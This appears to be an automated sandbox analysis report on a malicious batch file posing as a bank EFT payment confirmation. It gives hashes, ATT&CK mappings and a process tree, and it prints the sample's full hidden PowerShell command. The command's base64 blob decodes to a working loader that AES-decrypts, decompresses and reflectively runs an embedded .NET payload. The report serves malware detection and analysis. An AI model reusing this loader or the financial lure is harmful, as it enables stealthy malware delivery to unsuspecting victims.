3b792e3efcd49fa078b0f81556bae6a7bf3c58db676ae82221c001297e45a1bb

General

Target

Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat
Size

62KB
MD5

4e49fd9891d84a4dff53559ce3fb1e4c
SHA1

6b44eb8513213887a7cf7a21a2ef75472fb32bcf
SHA256

6036593430cc74f68abc87c13469083968dc94f011d12c50c845c1a44751e409
SHA512

feced2549a5da4ab69077b37a9cbf88824edc010cd8163025556c8c0c810b7599c1f982556bc613fa1cceee6467f2d89ad72ae467346546e4f848a4b62db2626
SSDEEP

1536:5ImZkbmEKUgXEXzICKUnFCtb4+tD3Ezpaljp228c+:5I3Hfctb4UD3EzpVBc+

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2792	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2792	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2792	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2244 wrote to memory of 2716	2244	cmd.exe	31
PID 2244 wrote to memory of 2716	2244	cmd.exe	31
PID 2244 wrote to memory of 2716	2244	cmd.exe	31
PID 2716 wrote to memory of 2792	2716	cmd.exe	33
PID 2716 wrote to memory of 2792	2716	cmd.exe	33
PID 2716 wrote to memory of 2792	2716	cmd.exe	33

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskZ2tveXQgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJGdrb3l0KSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRna295dCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRna295dCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkZ2tveXQiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gZGl1bnooJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ2xMYlE3dHpsWjVlRE4wNlpIQzVkTVJpYXFLcnc0dTU5bGhoTTh2cDlZRGc9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0hpY09vTElUU3hiVDB6aUlXK2JOUWc9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHV4bW4oJHBhcmFtX3Zhcil7CSR0c3ZicT1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkcXB5bHY9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkcWt0d3Q9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgkdHN2YnEsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJHFrdHd0LkNvcHlUbygkcXB5bHYpOwkkcWt0d3QuRGlzcG9zZSgpOwkkdHN2YnEuRGlzcG9zZSgpOwkkcXB5bHYuRGlzcG9zZSgpOwkkcXB5bHYuVG9BcnJheSgpO31mdW5jdGlvbiB1b2dlZSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHZycG9sPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGRrcnluPSR2cnBvbC5FbnRyeVBvaW50OwkkZGtyeW4uSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJGdrb3l0OyR6b2J2aD1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJGdrb3l0KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkbnZmIGluICR6b2J2aCkgewlpZiAoJG52Zi5TdGFydHNXaXRoKCc6OiAnKSkJewkJJHducXNhPSRudmYuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JGl4bXd2PVtzdHJpbmdbXV0kd25xc2EuU3BsaXQoJ1wnKTskdXl4ZHE9aHV4bW4gKGRpdW56IChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGl4bXd2WzBdKSkpOyR4eGp4aD1odXhtbiAoZGl1bnogKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkaXhtd3ZbMV0pKSk7dW9nZWUgJHV5eGRxICRudWxsO3VvZ2VlICR4eGp4aCAoLFtzdHJpbmdbXV0gKCclKicpKTs=')) | Invoke-Expression"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2792-6-0x000007FEF513E000-0x000007FEF513F000-memory.dmp

Filesize
4KB

Download
memory/2792-7-0x000000001B850000-0x000000001BB32000-memory.dmp

Filesize
2.9MB

Download
memory/2792-8-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

Filesize
9.6MB

Download
memory/2792-11-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

Filesize
9.6MB

Download
memory/2792-10-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

Filesize
9.6MB

Download
memory/2792-9-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download
memory/2792-12-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

Filesize
9.6MB

Download
memory/2792-13-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

Filesize
9.6MB

Download
memory/2792-14-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing